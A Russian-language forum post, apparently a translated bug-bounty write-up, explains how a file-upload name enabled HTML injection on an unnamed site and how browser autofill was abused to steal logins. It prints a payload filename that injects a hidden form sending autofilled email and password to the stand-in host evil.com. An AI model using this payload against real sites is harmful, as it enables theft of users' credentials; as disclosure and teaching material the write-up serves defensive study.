Использование функции автозаполнения для кражи учетных данных

Mutt

Professional
Reaction score
644
Эта статья носит исключительно образовательный характер. Автор не несет ответственности за любые последствия ее прочтения.
Данная статья является переводом и ведется со слов автора. Оригинал тут.
Статья расскажет вам о способе кражи пользовательских данных с помощью html-инъекции на сайте и функции автозаполнения в браузере жертвы.

Привет народ! Надеюсь, у вас все хорошо! Прошло много времени с тех пор, как я последний раз делал статью, поэтому эта публикация полностью посвящена данному твиту:

Давайте не будем терять время и начнем. Сайт запретил раскрывать себя, поэтому назовем его private.com.

HTML инъекция
Каждый мой ввод на этом сайте был корректно обработан приложением и потому мое внимание привлекла функция загрузки файлов. Мы можем загружать файлы, и есть общедоступная ссылка, которой мы можем поделиться с другими людьми, чтобы они тоже увидели мой файл. Я попытался обойти проверку расширения файла при загрузке, используя .svg, .html, .php, но мне не повезло. А затем я переименовал свой файл в <h1>xd.jpg и открыл его по общедоступной ссылке. Из-за имени файла произошла HTML-инъекция.

Итак, теперь у нас есть HTML-инъекция, следующая часть - это функция автосохранения.

Автозаполнение
В основном, когда мы сохранили учетные данные для входа в нашем браузере и хотим снова войти на сайт, браузер автоматически заполняет поле логина и пароля, а нам просто нужно нажать на кнопку логина (входа).

Поэтому я создал форму входа и сделал поле адреса электронной почты и пароля невидимыми, установив opaсity:0 в CSS, а мое окончательное имя файла выглядело так:
Code:
"><form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="submit"><!--.jpg
eb09b3cc94df4d1e4a8b2.png

Здесь я могу получить общедоступную ссылку на загруженный мной файл.
18b0b42ab0ec0a0818877.png

Так выглядит страница после посещения общедоступного URL-адреса моего загруженного файла.
c977a0f3162a6d64845ce.png

Когда кто-либо нажимает на кнопку submit, его учетные данные для входа отправляются на сервер злоумышленника.
9d3a44ecc735e5ac5a392.png

Итак, как это работает? Поля ввода заполняются автоматически благодаря функции автосохранения, а style="opacity:0;" скроет детали, отображаемые на странице. При нажатии submit информация автоматически отправляется на evil.com, из-за установки METHOD='GET' учетные данные для входа будут отправлены c GET запросом на evil.com, который является доменом злоумышленника. Последние символы <!-- закомментируют оставшийся HTML.

На этом все. Спасибо за просмотр.